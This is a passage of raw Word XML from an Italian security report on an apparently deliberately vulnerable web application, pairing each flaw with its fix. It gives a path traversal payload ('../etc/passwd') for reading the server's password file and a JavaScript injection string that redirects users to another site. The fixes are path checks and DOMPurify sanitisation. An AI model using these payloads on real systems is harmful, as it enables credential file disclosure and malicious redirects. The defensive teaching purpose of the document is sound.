      </w:r>
      <w:r>
        <w:t xml:space="preserve">) in modo da inserire al posto dell’immagine del profilo il seguente payload: </w:t>
      </w:r>
      <w:r w:rsidR="002F292A">
        <w:t>../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244260B" w14:textId="4CB224BF" w:rsidR="00071E32" w:rsidRDefault="0076032B" w:rsidP="0076032B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">che </w:t>
      </w:r>
      <w:r>
        <w:t>permette di leggere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> il file con le password salvate sul sistema </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dove viene eseguito il backend (Figura38). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833BBF3" w14:textId="22F4564F" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="0076032B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251833344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="129FD717" wp14:editId="197840DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-540385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3876040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7196455" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1094519647" name="Casella di testo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728D3A7D" w14:textId="24F3521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8</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web con invio della richiesta</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t xml:space="preserve"> malev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717" id="_x0000_s1065" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-42.55pt;margin-top:305.2pt;width:566.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smHAIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L07aJW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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="728D3A7D" w14:textId="24F35216" w:rsidR="0076032B" w:rsidRPr="009E77C1" w:rsidRDefault="0076032B" w:rsidP="0076032B">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>38</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web con invio della richiesta</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t xml:space="preserve"> malevola</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D272CAD" wp14:editId="7A795878">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22225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23F33" w14:textId="6C9896A7" w:rsidR="0076032B" w:rsidRPr="0076032B" w:rsidRDefault="0076032B" w:rsidP="0076032B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C862587" w14:textId="64053C86" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="002F292A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273795E4" w14:textId="49C936EF" w:rsidR="002F292A" w:rsidRPr="002F292A" w:rsidRDefault="002F292A" w:rsidP="002F292A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A1B0E1" w14:textId="43B0E4B5" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEBDDA9" w14:textId="2C9B5263" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C7EFCC" w14:textId="72914B1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13727C9E" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E326C8" w14:textId="54FDF1A9"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45727740" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693DFF6E" w14:textId="3F5FC2D1" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01478C2A" w14:textId="77777777" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD629C4" w14:textId="4C9A8B58" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090BDC7C" w14:textId="77777777" w:rsidR="008568AE" w:rsidRDefault="008568AE" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60EDA300" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="007F2270" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076032B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB064BE" w14:textId="5E0F72C4" w:rsidR="005A6F04" w:rsidRPr="0076032B" w:rsidRDefault="0076032B" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve">er il fix </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t>sono</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve"> sta</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve"> modificat</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve">i metodi </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getImage()</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> nel file </w:t>
      </w:r>
      <w:r w:rsidR="007F2270" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t xml:space="preserve">el backend introducendo dei controlli sul nome del path dove cercare l’immagine, sia nella POST </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve">che richiama la </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> (Figura 40) </w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t>che nella GET</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> (Figura 39)</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E571A5" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3130819C" w14:textId="408AA51B" w:rsidR="0076032B" w:rsidRDefault="004E2F86" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251835392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21ECC424" wp14:editId="6F9C8A14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>307340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2251075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5498465" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="956931604" name="Casella di testo 1"/>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D9F0165" w14:textId="1D5E15F4"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Pr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>39</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CC424" id="_x0000_s1066" type="#_x0000_t202" style="position:absolute;margin-left:24.2pt;margin-top:177.25pt;width:432.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YGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L066JOi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Z9NPtdD7jTFJs/nE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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5D9F0165" w14:textId="1D5E15F4" w:rsidR="004E2F86" w:rsidRPr="009C59F2"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Pr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>39</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B3363D1" wp14:editId="26257254">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-360045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5498465" cy="2554383"/>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40756"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5498465" cy="255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4F973" w14:textId="597CF064" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FD08A4" w14:textId="02926837" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6782B7" w14:textId="28CDE26C" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D0C1CC" w14:textId="2C4AAA13" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B07345" w14:textId="0651E03E" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AA3F4E" w14:textId="4524A65E" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763A96FC" w14:textId="6593379A" w:rsidR="008B6F6D" w:rsidRDefault="004E2F86" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251837440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BC901BC" wp14:editId="59DB5FAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4140835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4324350" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1176152285" name="Casella di testo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E01E25D" w14:textId="551E4CDF"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Pr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>40</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserController.java con metodo non vulnera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01BC" id="_x0000_s1067" type="#_x0000_t202" style="position:absolute;margin-left:70.7pt;margin-top:326.05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pq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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E01E25D" w14:textId="551E4CDF" w:rsidR="004E2F86" w:rsidRPr="00CA71CD" w:rsidRDefault="004E2F86" w:rsidP="004E2F86">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>40</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ACED2BA" wp14:editId="3CFA5BC7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>311785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4324350" cy="377236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b="40281"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4324350" cy="377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DABB5" w14:textId="5C1F7302" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E906230" w14:textId="29C17955" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C57FCE9" w14:textId="44AF6133" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5039EC28" w14:textId="2BC0E627"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3D6A5348" w:rsidR="005D6BD8" w:rsidRPr="00FC6F6C" w:rsidRDefault="005D6BD8" w:rsidP="0006778F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20BAF2" w14:textId="759A0165" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC">
      <w:r>
        <w:t>Si tratta di una vulnerabilità che ha lo scopo di inserire codice malevolo con lo scopo di eseguirlo lato utente. Ciò è possibile a causa di una mancanza di validazione di istruzioni che ricevono input dall’utente, consentendo l’interpretazione e l’esecuzione di tale codice da pare dell’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BAB6C" w14:textId="4920844F" w:rsidR="005D6BD8" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nel nostro codice è</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> stato modificato </w:t>
      </w:r>
      <w:r w:rsidR="005D6BD8">
        <w:t>HobbiePages.jsx e</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> viene richiamato quando l’utente clicca l’hobby. </w:t>
      </w:r>
      <w:r>
        <w:t>L’idea iniziale è quella di inserire un alert che mostri le informazioni di co</w:t>
      </w:r>
      <w:r w:rsidR="00C64892">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>tatto del business creatore dell’hobby. Tuttavia, dato un certo input è possibile inserire un’istruzione che fa il redirect ad un sito malevolo. In questo caso è stato usato il sito di Google come esempio</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Un attacante dovrebbe autenticarsi come utente business, inserire l’url al sito malevolo nelle sue informazioni di contatto con l’obiettivo di farlo aprire ad un utente normale.</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> Questo è il payload </w:t>
      </w:r>
      <w:r>
        <w:t>da inserire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434CFB6" w14:textId="1211311E" w:rsidR="00EB78A7" w:rsidRDefault="001B4E1A" w:rsidP="00467BBC">
      <w:r w:rsidRPr="001B4E1A">
        <w:t>');window.location.href = 'https://www.google.com'//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402712CC" w14:textId="6D83EBDF" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0ECDB41A" w14:textId="17EA2ED8" w:rsidR="00D12C9A" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16E8E6A7" wp14:editId="20CBF527">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3890010" cy="671830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1506041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32877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="389001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CCD0D" w14:textId="68BC392C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF52B8" w14:textId="3EF709E0" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="751C6E1A" w14:textId="6CCA9C05" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58F16B52" w14:textId="2F98151E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1906DDFE" w14:textId="019EA9FC" w:rsidR="004B30FC" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="541490E9" wp14:editId="3A374F06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-626745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3368040" cy="4226443"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="2112966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040" cy="4226443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4E922" w14:textId="4D02DB2A" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6658EDA7" w14:textId="695D9E66" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7AEB9243" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="70773928" w14:textId="77777777"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67095FFB" w14:textId="4240281D" w:rsidR="004B30FC" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: è stato usato DOMPurify per sanitizzare l’input ed è stato eliminato l’eval che è fonte di attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBB59E" w14:textId="090474AE" w:rsidR="0031586D" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47321C35" wp14:editId="56064616">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4229100" cy="14325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08"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229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281" w14:textId="77777777"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649C3F64" w14:textId="647A6AB7" w:rsidR="0031586D" w:rsidRPr="00FC6F6C" w:rsidRDefault="009B3431" w:rsidP="0006778F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00B11AA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ML External </w:t>
